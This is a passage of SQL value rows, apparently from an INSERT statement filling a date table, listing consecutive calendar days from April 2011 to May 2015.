('2011-04-18'),
('2011-04-19'),
('2011-04-20'),
('2011-04-21'),
('2011-04-22'),
('2011-04-23'),
('2011-04-24'),
('2011-04-25'),
('2011-04-26'),
('2011-04-27'),
('2011-04-28'),
('2011-04-29'),
('2011-04-30'),
('2011-05-01'),
('2011-05-02'),
('2011-05-03'),
('2011-05-04'),
('2011-05-05'),
('2011-05-06'),
('2011-05-07'),
('2011-05-08'),
('2011-05-09'),
('2011-05-10'),
('2011-05-11'),
('2011-05-12'),
('2011-05-13'),
('2011-05-14'),
('2011-05-15'),
('2011-05-16'),
('2011-05-17'),
('2011-05-18'),
('2011-05-19'),
('2011-05-20'),
('2011-05-21'),
('2011-05-22'),
('2011-05-23'),
('2011-05-24'),
('2011-05-25'),
('2011-05-26'),
('2011-05-27'),
('2011-05-28'),
('2011-05-29'),
('2011-05-30'),
('2011-05-31'),
('2011-06-01'),
('2011-06-02'),
('2011-06-03'),
('2011-06-04'),
('2011-06-05'),
('2011-06-06'),
('2011-06-07'),
('2011-06-08'),
('2011-06-09'),
('2011-06-10'),
('2011-06-11'),
('2011-06-12'),
('2011-06-13'),
('2011-06-14'),
('2011-06-15'),
('2011-06-16'),
('2011-06-17'),
('2011-06-18'),
('2011-06-19'),
('2011-06-20'),
('2011-06-21'),
('2011-06-22'),
('2011-06-23'),
('2011-06-24'),
('2011-06-25'),
('2011-06-26'),
('2011-06-27'),
('2011-06-28'),
('2011-06-29'),
('2011-06-30'),
('2011-07-01'),
('2011-07-02'),
('2011-07-03'),
('2011-07-04'),
('2011-07-05'),
('2011-07-06'),
('2011-07-07'),
('2011-07-08'),
('2011-07-09'),
('2011-07-10'),
('2011-07-11'),
('2011-07-12'),
('2011-07-13'),
('2011-07-14'),
('2011-07-15'),
('2011-07-16'),
('2011-07-17'),
('2011-07-18'),
('2011-07-19'),
('2011-07-20'),
('2011-07-21'),
('2011-07-22'),
('2011-07-23'),
('2011-07-24'),
('2011-07-25'),
('2011-07-26'),
('2011-07-27'),
('2011-07-28'),
('2011-07-29'),
('2011-07-30'),
('2011-07-31'),
('2011-08-01'),
('2011-08-02'),
('2011-08-03'),
('2011-08-04'),
('2011-08-05'),
('2011-08-06'),
('2011-08-07'),
('2011-08-08'),
('2011-08-09'),
('2011-08-10'),
('2011-08-11'),
('2011-08-12'),
('2011-08-13'),
('2011-08-14'),
('2011-08-15'),
('2011-08-16'),
('2011-08-17'),
('2011-08-18'),
('2011-08-19'),
('2011-08-20'),
('2011-08-21'),
('2011-08-22'),
('2011-08-23'),
('2011-08-24'),
('2011-08-25'),
('2011-08-26'),
('2011-08-27'),
('2011-08-28'),
('2011-08-29'),
('2011-08-30'),
('2011-08-31'),
('2011-09-01'),
('2011-09-02'),
('2011-09-03'),
('2011-09-04'),
('2011-09-05'),
('2011-09-06'),
('2011-09-07'),
('2011-09-08'),
('2011-09-09'),
('2011-09-10'),
('2011-09-11'),
('2011-09-12'),
('2011-09-13'),
('2011-09-14'),
('2011-09-15'),
('2011-09-16'),
('2011-09-17'),
('2011-09-18'),
('2011-09-19'),
('2011-09-20'),
('2011-09-21'),
('2011-09-22'),
('2011-09-23'),
('2011-09-24'),
('2011-09-25'),
('2011-09-26'),
('2011-09-27'),
('2011-09-28'),
('2011-09-29'),
('2011-09-30'),
('2011-10-01'),
('2011-10-02'),
('2011-10-03'),
('2011-10-04'),
('2011-10-05'),
('2011-10-06'),
('2011-10-07'),
('2011-10-08'),
('2011-10-09'),
('2011-10-10'),
('2011-10-11'),
('2011-10-12'),
('2011-10-13'),
('2011-10-14'),
('2011-10-15'),
('2011-10-16'),
('2011-10-17'),
('2011-10-18'),
('2011-10-19'),
('2011-10-20'),
('2011-10-21'),
('2011-10-22'),
('2011-10-23'),
('2011-10-24'),
('2011-10-25'),
('2011-10-26'),
('2011-10-27'),
('2011-10-28'),
('2011-10-29'),
('2011-10-30'),
('2011-10-31'),
('2011-11-01'),
('2011-11-02'),
('2011-11-03'),
('2011-11-04'),
('2011-11-05'),
('2011-11-06'),
('2011-11-07'),
('2011-11-08'),
('2011-11-09'),
('2011-11-10'),
('2011-11-11'),
('2011-11-12'),
('2011-11-13'),
('2011-11-14'),
('2011-11-15'),
('2011-11-16'),
('2011-11-17'),
('2011-11-18'),
('2011-11-19'),
('2011-11-20'),
('2011-11-21'),
('2011-11-22'),
('2011-11-23'),
('2011-11-24'),
('2011-11-25'),
('2011-11-26'),
('2011-11-27'),
('2011-11-28'),
('2011-11-29'),
('2011-11-30'),
('2011-12-01'),
('2011-12-02'),
('2011-12-03'),
('2011-12-04'),
('2011-12-05'),
('2011-12-06'),
('2011-12-07'),
('2011-12-08'),
('2011-12-09'),
('2011-12-10'),
('2011-12-11'),
('2011-12-12'),
('2011-12-13'),
('2011-12-14'),
('2011-12-15'),
('2011-12-16'),
('2011-12-17'),
('2011-12-18'),
('2011-12-19'),
('2011-12-20'),
('2011-12-21'),
('2011-12-22'),
('2011-12-23'),
('2011-12-24'),
('2011-12-25'),
('2011-12-26'),
('2011-12-27'),
('2011-12-28'),
('2011-12-29'),
('2011-12-30'),
('2011-12-31'),
('2012-01-01'),
('2012-01-02'),
('2012-01-03'),
('2012-01-04'),
('2012-01-05'),
('2012-01-06'),
('2012-01-07'),
('2012-01-08'),
('2012-01-09'),
('2012-01-10'),
('2012-01-11'),
('2012-01-12'),
('2012-01-13'),
('2012-01-14'),
('2012-01-15'),
('2012-01-16'),
('2012-01-17'),
('2012-01-18'),
('2012-01-19'),
('2012-01-20'),
('2012-01-21'),
('2012-01-22'),
('2012-01-23'),
('2012-01-24'),
('2012-01-25'),
('2012-01-26'),
('2012-01-27'),
('2012-01-28'),
('2012-01-29'),
('2012-01-30'),
('2012-01-31'),
('2012-02-01'),
('2012-02-02'),
('2012-02-03'),
('2012-02-04'),
('2012-02-05'),
('2012-02-06'),
('2012-02-07'),
('2012-02-08'),
('2012-02-09'),
('2012-02-10'),
('2012-02-11'),
('2012-02-12'),
('2012-02-13'),
('2012-02-14'),
('2012-02-15'),
('2012-02-16'),
('2012-02-17'),
('2012-02-18'),
('2012-02-19'),
('2012-02-20'),
('2012-02-21'),
('2012-02-22'),
('2012-02-23'),
('2012-02-24'),
('2012-02-25'),
('2012-02-26'),
('2012-02-27'),
('2012-02-28'),
('2012-02-29'),
('2012-03-01'),
('2012-03-02'),
('2012-03-03'),
('2012-03-04'),
('2012-03-05'),
('2012-03-06'),
('2012-03-07'),
('2012-03-08'),
('2012-03-09'),
('2012-03-10'),
('2012-03-11'),
('2012-03-12'),
('2012-03-13'),
('2012-03-14'),
('2012-03-15'),
('2012-03-16'),
('2012-03-17'),
('2012-03-18'),
('2012-03-19'),
('2012-03-20'),
('2012-03-21'),
('2012-03-22'),
('2012-03-23'),
('2012-03-24'),
('2012-03-25'),
('2012-03-26'),
('2012-03-27'),
('2012-03-28'),
('2012-03-29'),
('2012-03-30'),
('2012-03-31'),
('2012-04-01'),
('2012-04-02'),
('2012-04-03'),
('2012-04-04'),
('2012-04-05'),
('2012-04-06'),
('2012-04-07'),
('2012-04-08'),
('2012-04-09'),
('2012-04-10'),
('2012-04-11'),
('2012-04-12'),
('2012-04-13'),
('2012-04-14'),
('2012-04-15'),
('2012-04-16'),
('2012-04-17'),
('2012-04-18'),
('2012-04-19'),
('2012-04-20'),
('2012-04-21'),
('2012-04-22'),
('2012-04-23'),
('2012-04-24'),
('2012-04-25'),
('2012-04-26'),
('2012-04-27'),
('2012-04-28'),
('2012-04-29'),
('2012-04-30'),
('2012-05-01'),
('2012-05-02'),
('2012-05-03'),
('2012-05-04'),
('2012-05-05'),
('2012-05-06'),
('2012-05-07'),
('2012-05-08'),
('2012-05-09'),
('2012-05-10'),
('2012-05-11'),
('2012-05-12'),
('2012-05-13'),
('2012-05-14'),
('2012-05-15'),
('2012-05-16'),
('2012-05-17'),
('2012-05-18'),
('2012-05-19'),
('2012-05-20'),
('2012-05-21'),
('2012-05-22'),
('2012-05-23'),
('2012-05-24'),
('2012-05-25'),
('2012-05-26'),
('2012-05-27'),
('2012-05-28'),
('2012-05-29'),
('2012-05-30'),
('2012-05-31'),
('2012-06-01'),
('2012-06-02'),
('2012-06-03'),
('2012-06-04'),
('2012-06-05'),
('2012-06-06'),
('2012-06-07'),
('2012-06-08'),
('2012-06-09'),
('2012-06-10'),
('2012-06-11'),
('2012-06-12'),
('2012-06-13'),
('2012-06-14'),
('2012-06-15'),
('2012-06-16'),
('2012-06-17'),
('2012-06-18'),
('2012-06-19'),
('2012-06-20'),
('2012-06-21'),
('2012-06-22'),
('2012-06-23'),
('2012-06-24'),
('2012-06-25'),
('2012-06-26'),
('2012-06-27'),
('2012-06-28'),
('2012-06-29'),
('2012-06-30'),
('2012-07-01'),
('2012-07-02'),
('2012-07-03'),
('2012-07-04'),
('2012-07-05'),
('2012-07-06'),
('2012-07-07'),
('2012-07-08'),
('2012-07-09'),
('2012-07-10'),
('2012-07-11'),
('2012-07-12'),
('2012-07-13'),
('2012-07-14'),
('2012-07-15'),
('2012-07-16'),
('2012-07-17'),
('2012-07-18'),
('2012-07-19'),
('2012-07-20'),
('2012-07-21'),
('2012-07-22'),
('2012-07-23'),
('2012-07-24'),
('2012-07-25'),
('2012-07-26'),
('2012-07-27'),
('2012-07-28'),
('2012-07-29'),
('2012-07-30'),
('2012-07-31'),
('2012-08-01'),
('2012-08-02'),
('2012-08-03'),
('2012-08-04'),
('2012-08-05'),
('2012-08-06'),
('2012-08-07'),
('2012-08-08'),
('2012-08-09'),
('2012-08-10'),
('2012-08-11'),
('2012-08-12'),
('2012-08-13'),
('2012-08-14'),
('2012-08-15'),
('2012-08-16'),
('2012-08-17'),
('2012-08-18'),
('2012-08-19'),
('2012-08-20'),
('2012-08-21'),
('2012-08-22'),
('2012-08-23'),
('2012-08-24'),
('2012-08-25'),
('2012-08-26'),
('2012-08-27'),
('2012-08-28'),
('2012-08-29'),
('2012-08-30'),
('2012-08-31'),
('2012-09-01'),
('2012-09-02'),
('2012-09-03'),
('2012-09-04'),
('2012-09-05'),
('2012-09-06'),
('2012-09-07'),
('2012-09-08'),
('2012-09-09'),
('2012-09-10'),
('2012-09-11'),
('2012-09-12'),
('2012-09-13'),
('2012-09-14'),
('2012-09-15'),
('2012-09-16'),
('2012-09-17'),
('2012-09-18'),
('2012-09-19'),
('2012-09-20'),
('2012-09-21'),
('2012-09-22'),
('2012-09-23'),
('2012-09-24'),
('2012-09-25'),
('2012-09-26'),
('2012-09-27'),
('2012-09-28'),
('2012-09-29'),
('2012-09-30'),
('2012-10-01'),
('2012-10-02'),
('2012-10-03'),
('2012-10-04'),
('2012-10-05'),
('2012-10-06'),
('2012-10-07'),
('2012-10-08'),
('2012-10-09'),
('2012-10-10'),
('2012-10-11'),
('2012-10-12'),
('2012-10-13'),
('2012-10-14'),
('2012-10-15'),
('2012-10-16'),
('2012-10-17'),
('2012-10-18'),
('2012-10-19'),
('2012-10-20'),
('2012-10-21'),
('2012-10-22'),
('2012-10-23'),
('2012-10-24'),
('2012-10-25'),
('2012-10-26'),
('2012-10-27'),
('2012-10-28'),
('2012-10-29'),
('2012-10-30'),
('2012-10-31'),
('2012-11-01'),
('2012-11-02'),
('2012-11-03'),
('2012-11-04'),
('2012-11-05'),
('2012-11-06'),
('2012-11-07'),
('2012-11-08'),
('2012-11-09'),
('2012-11-10'),
('2012-11-11'),
('2012-11-12'),
('2012-11-13'),
('2012-11-14'),
('2012-11-15'),
('2012-11-16'),
('2012-11-17'),
('2012-11-18'),
('2012-11-19'),
('2012-11-20'),
('2012-11-21'),
('2012-11-22'),
('2012-11-23'),
('2012-11-24'),
('2012-11-25'),
('2012-11-26'),
('2012-11-27'),
('2012-11-28'),
('2012-11-29'),
('2012-11-30'),
('2012-12-01'),
('2012-12-02'),
('2012-12-03'),
('2012-12-04'),
('2012-12-05'),
('2012-12-06'),
('2012-12-07'),
('2012-12-08'),
('2012-12-09'),
('2012-12-10'),
('2012-12-11'),
('2012-12-12'),
('2012-12-13'),
('2012-12-14'),
('2012-12-15'),
('2012-12-16'),
('2012-12-17'),
('2012-12-18'),
('2012-12-19'),
('2012-12-20'),
('2012-12-21'),
('2012-12-22'),
('2012-12-23'),
('2012-12-24'),
('2012-12-25'),
('2012-12-26'),
('2012-12-27'),
('2012-12-28'),
('2012-12-29'),
('2012-12-30'),
('2012-12-31'),
('2013-01-01'),
('2013-01-02'),
('2013-01-03'),
('2013-01-04'),
('2013-01-05'),
('2013-01-06'),
('2013-01-07'),
('2013-01-08'),
('2013-01-09'),
('2013-01-10'),
('2013-01-11'),
('2013-01-12'),
('2013-01-13'),
('2013-01-14'),
('2013-01-15'),
('2013-01-16'),
('2013-01-17'),
('2013-01-18'),
('2013-01-19'),
('2013-01-20'),
('2013-01-21'),
('2013-01-22'),
('2013-01-23'),
('2013-01-24'),
('2013-01-25'),
('2013-01-26'),
('2013-01-27'),
('2013-01-28'),
('2013-01-29'),
('2013-01-30'),
('2013-01-31'),
('2013-02-01'),
('2013-02-02'),
('2013-02-03'),
('2013-02-04'),
('2013-02-05'),
('2013-02-06'),
('2013-02-07'),
('2013-02-08'),
('2013-02-09'),
('2013-02-10'),
('2013-02-11'),
('2013-02-12'),
('2013-02-13'),
('2013-02-14'),
('2013-02-15'),
('2013-02-16'),
('2013-02-17'),
('2013-02-18'),
('2013-02-19'),
('2013-02-20'),
('2013-02-21'),
('2013-02-22'),
('2013-02-23'),
('2013-02-24'),
('2013-02-25'),
('2013-02-26'),
('2013-02-27'),
('2013-02-28'),
('2013-03-01'),
('2013-03-02'),
('2013-03-03'),
('2013-03-04'),
('2013-03-05'),
('2013-03-06'),
('2013-03-07'),
('2013-03-08'),
('2013-03-09'),
('2013-03-10'),
('2013-03-11'),
('2013-03-12'),
('2013-03-13'),
('2013-03-14'),
('2013-03-15'),
('2013-03-16'),
('2013-03-17'),
('2013-03-18'),
('2013-03-19'),
('2013-03-20'),
('2013-03-21'),
('2013-03-22'),
('2013-03-23'),
('2013-03-24'),
('2013-03-25'),
('2013-03-26'),
('2013-03-27'),
('2013-03-28'),
('2013-03-29'),
('2013-03-30'),
('2013-03-31'),
('2013-04-01'),
('2013-04-02'),
('2013-04-03'),
('2013-04-04'),
('2013-04-05'),
('2013-04-06'),
('2013-04-07'),
('2013-04-08'),
('2013-04-09'),
('2013-04-10'),
('2013-04-11'),
('2013-04-12'),
('2013-04-13'),
('2013-04-14'),
('2013-04-15'),
('2013-04-16'),
('2013-04-17'),
('2013-04-18'),
('2013-04-19'),
('2013-04-20'),
('2013-04-21'),
('2013-04-22'),
('2013-04-23'),
('2013-04-24'),
('2013-04-25'),
('2013-04-26'),
('2013-04-27'),
('2013-04-28'),
('2013-04-29'),
('2013-04-30'),
('2013-05-01'),
('2013-05-02'),
('2013-05-03'),
('2013-05-04'),
('2013-05-05'),
('2013-05-06'),
('2013-05-07'),
('2013-05-08'),
('2013-05-09'),
('2013-05-10'),
('2013-05-11'),
('2013-05-12'),
('2013-05-13'),
('2013-05-14'),
('2013-05-15'),
('2013-05-16'),
('2013-05-17'),
('2013-05-18'),
('2013-05-19'),
('2013-05-20'),
('2013-05-21'),
('2013-05-22'),
('2013-05-23'),
('2013-05-24'),
('2013-05-25'),
('2013-05-26'),
('2013-05-27'),
('2013-05-28'),
('2013-05-29'),
('2013-05-30'),
('2013-05-31'),
('2013-06-01'),
('2013-06-02'),
('2013-06-03'),
('2013-06-04'),
('2013-06-05'),
('2013-06-06'),
('2013-06-07'),
('2013-06-08'),
('2013-06-09'),
('2013-06-10'),
('2013-06-11'),
('2013-06-12'),
('2013-06-13'),
('2013-06-14'),
('2013-06-15'),
('2013-06-16'),
('2013-06-17'),
('2013-06-18'),
('2013-06-19'),
('2013-06-20'),
('2013-06-21'),
('2013-06-22'),
('2013-06-23'),
('2013-06-24'),
('2013-06-25'),
('2013-06-26'),
('2013-06-27'),
('2013-06-28'),
('2013-06-29'),
('2013-06-30'),
('2013-07-01'),
('2013-07-02'),
('2013-07-03'),
('2013-07-04'),
('2013-07-05'),
('2013-07-06'),
('2013-07-07'),
('2013-07-08'),
('2013-07-09'),
('2013-07-10'),
('2013-07-11'),
('2013-07-12'),
('2013-07-13'),
('2013-07-14'),
('2013-07-15'),
('2013-07-16'),
('2013-07-17'),
('2013-07-18'),
('2013-07-19'),
('2013-07-20'),
('2013-07-21'),
('2013-07-22'),
('2013-07-23'),
('2013-07-24'),
('2013-07-25'),
('2013-07-26'),
('2013-07-27'),
('2013-07-28'),
('2013-07-29'),
('2013-07-30'),
('2013-07-31'),
('2013-08-01'),
('2013-08-02'),
('2013-08-03'),
('2013-08-04'),
('2013-08-05'),
('2013-08-06'),
('2013-08-07'),
('2013-08-08'),
('2013-08-09'),
('2013-08-10'),
('2013-08-11'),
('2013-08-12'),
('2013-08-13'),
('2013-08-14'),
('2013-08-15'),
('2013-08-16'),
('2013-08-17'),
('2013-08-18'),
('2013-08-19'),
('2013-08-20'),
('2013-08-21'),
('2013-08-22'),
('2013-08-23'),
('2013-08-24'),
('2013-08-25'),
('2013-08-26'),
('2013-08-27'),
('2013-08-28'),
('2013-08-29'),
('2013-08-30'),
('2013-08-31'),
('2013-09-01'),
('2013-09-02'),
('2013-09-03'),
('2013-09-04'),
('2013-09-05'),
('2013-09-06'),
('2013-09-07'),
('2013-09-08'),
('2013-09-09'),
('2013-09-10'),
('2013-09-11'),
('2013-09-12'),
('2013-09-13'),
('2013-09-14'),
('2013-09-15'),
('2013-09-16'),
('2013-09-17'),
('2013-09-18'),
('2013-09-19'),
('2013-09-20'),
('2013-09-21'),
('2013-09-22'),
('2013-09-23'),
('2013-09-24'),
('2013-09-25'),
('2013-09-26'),
('2013-09-27'),
('2013-09-28'),
('2013-09-29'),
('2013-09-30'),
('2013-10-01'),
('2013-10-02'),
('2013-10-03'),
('2013-10-04'),
('2013-10-05'),
('2013-10-06'),
('2013-10-07'),
('2013-10-08'),
('2013-10-09'),
('2013-10-10'),
('2013-10-11'),
('2013-10-12'),
('2013-10-13'),
('2013-10-14'),
('2013-10-15'),
('2013-10-16'),
('2013-10-17'),
('2013-10-18'),
('2013-10-19'),
('2013-10-20'),
('2013-10-21'),
('2013-10-22'),
('2013-10-23'),
('2013-10-24'),
('2013-10-25'),
('2013-10-26'),
('2013-10-27'),
('2013-10-28'),
('2013-10-29'),
('2013-10-30'),
('2013-10-31'),
('2013-11-01'),
('2013-11-02'),
('2013-11-03'),
('2013-11-04'),
('2013-11-05'),
('2013-11-06'),
('2013-11-07'),
('2013-11-08'),
('2013-11-09'),
('2013-11-10'),
('2013-11-11'),
('2013-11-12'),
('2013-11-13'),
('2013-11-14'),
('2013-11-15'),
('2013-11-16'),
('2013-11-17'),
('2013-11-18'),
('2013-11-19'),
('2013-11-20'),
('2013-11-21'),
('2013-11-22'),
('2013-11-23'),
('2013-11-24'),
('2013-11-25'),
('2013-11-26'),
('2013-11-27'),
('2013-11-28'),
('2013-11-29'),
('2013-11-30'),
('2013-12-01'),
('2013-12-02'),
('2013-12-03'),
('2013-12-04'),
('2013-12-05'),
('2013-12-06'),
('2013-12-07'),
('2013-12-08'),
('2013-12-09'),
('2013-12-10'),
('2013-12-11'),
('2013-12-12'),
('2013-12-13'),
('2013-12-14'),
('2013-12-15'),
('2013-12-16'),
('2013-12-17'),
('2013-12-18'),
('2013-12-19'),
('2013-12-20'),
('2013-12-21'),
('2013-12-22'),
('2013-12-23'),
('2013-12-24'),
('2013-12-25'),
('2013-12-26'),
('2013-12-27'),
('2013-12-28'),
('2013-12-29'),
('2013-12-30'),
('2013-12-31'),
('2014-01-01'),
('2014-01-02'),
('2014-01-03'),
('2014-01-04'),
('2014-01-05'),
('2014-01-06'),
('2014-01-07'),
('2014-01-08'),
('2014-01-09'),
('2014-01-10'),
('2014-01-11'),
('2014-01-12'),
('2014-01-13'),
('2014-01-14'),
('2014-01-15'),
('2014-01-16'),
('2014-01-17'),
('2014-01-18'),
('2014-01-19'),
('2014-01-20'),
('2014-01-21'),
('2014-01-22'),
('2014-01-23'),
('2014-01-24'),
('2014-01-25'),
('2014-01-26'),
('2014-01-27'),
('2014-01-28'),
('2014-01-29'),
('2014-01-30'),
('2014-01-31'),
('2014-02-01'),
('2014-02-02'),
('2014-02-03'),
('2014-02-04'),
('2014-02-05'),
('2014-02-06'),
('2014-02-07'),
('2014-02-08'),
('2014-02-09'),
('2014-02-10'),
('2014-02-11'),
('2014-02-12'),
('2014-02-13'),
('2014-02-14'),
('2014-02-15'),
('2014-02-16'),
('2014-02-17'),
('2014-02-18'),
('2014-02-19'),
('2014-02-20'),
('2014-02-21'),
('2014-02-22'),
('2014-02-23'),
('2014-02-24'),
('2014-02-25'),
('2014-02-26'),
('2014-02-27'),
('2014-02-28'),
('2014-03-01'),
('2014-03-02'),
('2014-03-03'),
('2014-03-04'),
('2014-03-05'),
('2014-03-06'),
('2014-03-07'),
('2014-03-08'),
('2014-03-09'),
('2014-03-10'),
('2014-03-11'),
('2014-03-12'),
('2014-03-13'),
('2014-03-14'),
('2014-03-15'),
('2014-03-16'),
('2014-03-17'),
('2014-03-18'),
('2014-03-19'),
('2014-03-20'),
('2014-03-21'),
('2014-03-22'),
('2014-03-23'),
('2014-03-24'),
('2014-03-25'),
('2014-03-26'),
('2014-03-27'),
('2014-03-28'),
('2014-03-29'),
('2014-03-30'),
('2014-03-31'),
('2014-04-01'),
('2014-04-02'),
('2014-04-03'),
('2014-04-04'),
('2014-04-05'),
('2014-04-06'),
('2014-04-07'),
('2014-04-08'),
('2014-04-09'),
('2014-04-10'),
('2014-04-11'),
('2014-04-12'),
('2014-04-13'),
('2014-04-14'),
('2014-04-15'),
('2014-04-16'),
('2014-04-17'),
('2014-04-18'),
('2014-04-19'),
('2014-04-20'),
('2014-04-21'),
('2014-04-22'),
('2014-04-23'),
('2014-04-24'),
('2014-04-25'),
('2014-04-26'),
('2014-04-27'),
('2014-04-28'),
('2014-04-29'),
('2014-04-30'),
('2014-05-01'),
('2014-05-02'),
('2014-05-03'),
('2014-05-04'),
('2014-05-05'),
('2014-05-06'),
('2014-05-07'),
('2014-05-08'),
('2014-05-09'),
('2014-05-10'),
('2014-05-11'),
('2014-05-12'),
('2014-05-13'),
('2014-05-14'),
('2014-05-15'),
('2014-05-16'),
('2014-05-17'),
('2014-05-18'),
('2014-05-19'),
('2014-05-20'),
('2014-05-21'),
('2014-05-22'),
('2014-05-23'),
('2014-05-24'),
('2014-05-25'),
('2014-05-26'),
('2014-05-27'),
('2014-05-28'),
('2014-05-29'),
('2014-05-30'),
('2014-05-31'),
('2014-06-01'),
('2014-06-02'),
('2014-06-03'),
('2014-06-04'),
('2014-06-05'),
('2014-06-06'),
('2014-06-07'),
('2014-06-08'),
('2014-06-09'),
('2014-06-10'),
('2014-06-11'),
('2014-06-12'),
('2014-06-13'),
('2014-06-14'),
('2014-06-15'),
('2014-06-16'),
('2014-06-17'),
('2014-06-18'),
('2014-06-19'),
('2014-06-20'),
('2014-06-21'),
('2014-06-22'),
('2014-06-23'),
('2014-06-24'),
('2014-06-25'),
('2014-06-26'),
('2014-06-27'),
('2014-06-28'),
('2014-06-29'),
('2014-06-30'),
('2014-07-01'),
('2014-07-02'),
('2014-07-03'),
('2014-07-04'),
('2014-07-05'),
('2014-07-06'),
('2014-07-07'),
('2014-07-08'),
('2014-07-09'),
('2014-07-10'),
('2014-07-11'),
('2014-07-12'),
('2014-07-13'),
('2014-07-14'),
('2014-07-15'),
('2014-07-16'),
('2014-07-17'),
('2014-07-18'),
('2014-07-19'),
('2014-07-20'),
('2014-07-21'),
('2014-07-22'),
('2014-07-23'),
('2014-07-24'),
('2014-07-25'),
('2014-07-26'),
('2014-07-27'),
('2014-07-28'),
('2014-07-29'),
('2014-07-30'),
('2014-07-31'),
('2014-08-01'),
('2014-08-02'),
('2014-08-03'),
('2014-08-04'),
('2014-08-05'),
('2014-08-06'),
('2014-08-07'),
('2014-08-08'),
('2014-08-09'),
('2014-08-10'),
('2014-08-11'),
('2014-08-12'),
('2014-08-13'),
('2014-08-14'),
('2014-08-15'),
('2014-08-16'),
('2014-08-17'),
('2014-08-18'),
('2014-08-19'),
('2014-08-20'),
('2014-08-21'),
('2014-08-22'),
('2014-08-23'),
('2014-08-24'),
('2014-08-25'),
('2014-08-26'),
('2014-08-27'),
('2014-08-28'),
('2014-08-29'),
('2014-08-30'),
('2014-08-31'),
('2014-09-01'),
('2014-09-02'),
('2014-09-03'),
('2014-09-04'),
('2014-09-05'),
('2014-09-06'),
('2014-09-07'),
('2014-09-08'),
('2014-09-09'),
('2014-09-10'),
('2014-09-11'),
('2014-09-12'),
('2014-09-13'),
('2014-09-14'),
('2014-09-15'),
('2014-09-16'),
('2014-09-17'),
('2014-09-18'),
('2014-09-19'),
('2014-09-20'),
('2014-09-21'),
('2014-09-22'),
('2014-09-23'),
('2014-09-24'),
('2014-09-25'),
('2014-09-26'),
('2014-09-27'),
('2014-09-28'),
('2014-09-29'),
('2014-09-30'),
('2014-10-01'),
('2014-10-02'),
('2014-10-03'),
('2014-10-04'),
('2014-10-05'),
('2014-10-06'),
('2014-10-07'),
('2014-10-08'),
('2014-10-09'),
('2014-10-10'),
('2014-10-11'),
('2014-10-12'),
('2014-10-13'),
('2014-10-14'),
('2014-10-15'),
('2014-10-16'),
('2014-10-17'),
('2014-10-18'),
('2014-10-19'),
('2014-10-20'),
('2014-10-21'),
('2014-10-22'),
('2014-10-23'),
('2014-10-24'),
('2014-10-25'),
('2014-10-26'),
('2014-10-27'),
('2014-10-28'),
('2014-10-29'),
('2014-10-30'),
('2014-10-31'),
('2014-11-01'),
('2014-11-02'),
('2014-11-03'),
('2014-11-04'),
('2014-11-05'),
('2014-11-06'),
('2014-11-07'),
('2014-11-08'),
('2014-11-09'),
('2014-11-10'),
('2014-11-11'),
('2014-11-12'),
('2014-11-13'),
('2014-11-14'),
('2014-11-15'),
('2014-11-16'),
('2014-11-17'),
('2014-11-18'),
('2014-11-19'),
('2014-11-20'),
('2014-11-21'),
('2014-11-22'),
('2014-11-23'),
('2014-11-24'),
('2014-11-25'),
('2014-11-26'),
('2014-11-27'),
('2014-11-28'),
('2014-11-29'),
('2014-11-30'),
('2014-12-01'),
('2014-12-02'),
('2014-12-03'),
('2014-12-04'),
('2014-12-05'),
('2014-12-06'),
('2014-12-07'),
('2014-12-08'),
('2014-12-09'),
('2014-12-10'),
('2014-12-11'),
('2014-12-12'),
('2014-12-13'),
('2014-12-14'),
('2014-12-15'),
('2014-12-16'),
('2014-12-17'),
('2014-12-18'),
('2014-12-19'),
('2014-12-20'),
('2014-12-21'),
('2014-12-22'),
('2014-12-23'),
('2014-12-24'),
('2014-12-25'),
('2014-12-26'),
('2014-12-27'),
('2014-12-28'),
('2014-12-29'),
('2014-12-30'),
('2014-12-31'),
('2015-01-01'),
('2015-01-02'),
('2015-01-03'),
('2015-01-04'),
('2015-01-05'),
('2015-01-06'),
('2015-01-07'),
('2015-01-08'),
('2015-01-09'),
('2015-01-10'),
('2015-01-11'),
('2015-01-12'),
('2015-01-13'),
('2015-01-14'),
('2015-01-15'),
('2015-01-16'),
('2015-01-17'),
('2015-01-18'),
('2015-01-19'),
('2015-01-20'),
('2015-01-21'),
('2015-01-22'),
('2015-01-23'),
('2015-01-24'),
('2015-01-25'),
('2015-01-26'),
('2015-01-27'),
('2015-01-28'),
('2015-01-29'),
('2015-01-30'),
('2015-01-31'),
('2015-02-01'),
('2015-02-02'),
('2015-02-03'),
('2015-02-04'),
('2015-02-05'),
('2015-02-06'),
('2015-02-07'),
('2015-02-08'),
('2015-02-09'),
('2015-02-10'),
('2015-02-11'),
('2015-02-12'),
('2015-02-13'),
('2015-02-14'),
('2015-02-15'),
('2015-02-16'),
('2015-02-17'),
('2015-02-18'),
('2015-02-19'),
('2015-02-20'),
('2015-02-21'),
('2015-02-22'),
('2015-02-23'),
('2015-02-24'),
('2015-02-25'),
('2015-02-26'),
('2015-02-27'),
('2015-02-28'),
('2015-03-01'),
('2015-03-02'),
('2015-03-03'),
('2015-03-04'),
('2015-03-05'),
('2015-03-06'),
('2015-03-07'),
('2015-03-08'),
('2015-03-09'),
('2015-03-10'),
('2015-03-11'),
('2015-03-12'),
('2015-03-13'),
('2015-03-14'),
('2015-03-15'),
('2015-03-16'),
('2015-03-17'),
('2015-03-18'),
('2015-03-19'),
('2015-03-20'),
('2015-03-21'),
('2015-03-22'),
('2015-03-23'),
('2015-03-24'),
('2015-03-25'),
('2015-03-26'),
('2015-03-27'),
('2015-03-28'),
('2015-03-29'),
('2015-03-30'),
('2015-03-31'),
('2015-04-01'),
('2015-04-02'),
('2015-04-03'),
('2015-04-04'),
('2015-04-05'),
('2015-04-06'),
('2015-04-07'),
('2015-04-08'),
('2015-04-09'),
('2015-04-10'),
('2015-04-11'),
('2015-04-12'),
('2015-04-13'),
('2015-04-14'),
('2015-04-15'),
('2015-04-16'),
('2015-04-17'),
('2015-04-18'),
('2015-04-19'),
('2015-04-20'),
('2015-04-21'),
('2015-04-22'),
('2015-04-23'),
('2015-04-24'),
('2015-04-25'),
('2015-04-26'),
('2015-04-27'),
('2015-04-28'),
('2015-04-29'),
('2015-04-30'),
('2015-05-01'),
('2015-05-02'),
('2015-05-03'),
('2015-05-04'),
('2015-05-05'),
('2015-05-06'),
('2015-05-07'),
('2015-05-08'),
('2015-05-09'),
('2015-05-10'),
('2015-05-11'),
('2015-05-12'),
('2015-05-13'),
('2015-05-14'),
('2015-05-15'),
('2015-05-16'),
('2015-05-17'),
('2015-05-18'),
('2015-05-19'),
('2015-05-20'),
('2015-05-21'),
('2015-05-22'),
('2015-05-23'),
('2015-05-24'),
('2015-05-25'),
('2015-05-26'),
